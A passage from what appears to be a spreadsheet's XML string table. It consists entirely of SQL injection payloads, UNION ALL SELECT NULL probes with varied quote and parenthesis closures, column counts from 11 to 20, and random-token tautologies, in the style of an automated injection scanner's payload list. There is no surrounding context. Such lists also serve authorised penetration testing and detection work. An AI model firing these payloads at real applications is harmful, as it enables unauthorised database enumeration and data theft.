    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 1801 = 1801</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 6671 = 6671</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5726 = 5726</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  2680 = 2680</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3023 = 3023</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8635 = 8635</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  930 = 930</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1914 = 1914</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  2979 = 2979</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  7444 = 7444</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8689 = 8689</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5183 = 5183</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 7174 = 7174</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 5689 = 5689</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 541 = 541</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 6519 = 6519</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 4767 = 4767</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3272 = 3272</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1545 = 1545</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8909 = 8909</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8436 = 8436</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 7049 = 7049</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'gFPC' = 'gFPC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'FapE' = 'FapE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'XQEw' = 'XQEw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ofWz' = 'ofWz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vkqo' = 'vkqo</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ZdGg' = 'ZdGg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'YWLZ' = 'YWLZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'kcDO' = 'kcDO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'vTZg' = 'vTZg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'kmPr' = 'kmPr</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qWDl' = 'qWDl</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'npik' = 'npik</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'wVac' = 'wVac</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'lKfv' = 'lKfv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'tGvR' = 'tGvR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'okOC' = 'okOC</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'nNyh' = 'nNyh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'KeuK' = 'KeuK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'uczJ' = 'uczJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gliW' = 'gliW</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'tPDj' = 'tPDj</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'rMAu' = 'rMAu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'IClw' = 'IClw</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'DQOb' = 'DQOb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'MwoT' = 'MwoT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'mEbE' = 'mEbE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jLXG' = 'jLXG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'gfTM' = 'gfTM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'WRWJ' = 'WRWJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'wUWj' = 'wUWj</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xyEy' = 'xyEy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'dKBh' = 'dKBh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'jrgQ' = 'jrgQ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'LEwi' = 'LEwi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'qNtm' = 'qNtm</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'mYHc' = 'mYHc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'LKKB' = 'LKKB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'BJbG' = 'BJbG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'KUuM' = 'KUuM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YzpJ' = 'YzpJ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'TNGf' LIKE 'TNGf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'Srck' LIKE 'Srck</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mhPh' LIKE 'mhPh</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ANHE' LIKE 'ANHE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sjfH' LIKE 'sjfH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sbgA' LIKE 'sbgA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'eOlP' LIKE 'eOlP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'IWDU' LIKE 'IWDU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'NsAi' LIKE 'NsAi</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'hafE' LIKE 'hafE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'yCee' LIKE 'yCee</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Bujy' LIKE 'Bujy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vUbA' LIKE 'vUbA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'vIVJ' LIKE 'vIVJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'aMke' LIKE 'aMke</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Uxaf' LIKE 'Uxaf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'dnmL' LIKE 'dnmL</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'EkvS' LIKE 'EkvS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'sZDn' LIKE 'sZDn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'snMX' LIKE 'snMX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'esYe' LIKE 'esYe</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'FwYl' LIKE 'FwYl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'HBWh' LIKE 'HBWh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'SkEu' LIKE 'SkEu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'DnIK' LIKE 'DnIK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'cTgs' LIKE 'cTgs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'qthY' LIKE 'qthY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'iYVv' LIKE 'iYVv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'gXzy' LIKE 'gXzy</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'ukyP' LIKE 'ukyP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'chkz' LIKE 'chkz</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'YBkc' LIKE 'YBkc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'yrEv' LIKE 'yrEv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'wZwV' LIKE 'wZwV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'OsnB' LIKE 'OsnB</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'hnLv' LIKE 'hnLv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'VDKi' LIKE 'VDKi</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'xOAW' LIKE 'xOAW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'HWrK' LIKE 'HWrK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'NXln' LIKE 'NXln</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "XWUs" = "XWUs</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qskD" = "qskD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "lXsD" = "lXsD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qEXE" = "qEXE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "fHTT" = "fHTT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "onDw" = "onDw</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "UCTY" = "UCTY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "SwVJ" = "SwVJ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "VpxX" = "VpxX</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "OZNG" = "OZNG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Aimf" = "Aimf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "HYzv" = "HYzv</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "LDzw" = "LDzw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Gonl" = "Gonl</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "bjlp" = "bjlp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "LAeZ" = "LAeZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hKwa" = "hKwa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "sqtJ" = "sqtJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "VYyP" = "VYyP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "Intx" = "Intx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "pZQi" = "pZQi</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "zMrd" = "zMrd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "mCrK" = "mCrK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yGpH" = "yGpH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "fXbZ" = "fXbZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "XsyY" = "XsyY</t>
  </si>
  <si>
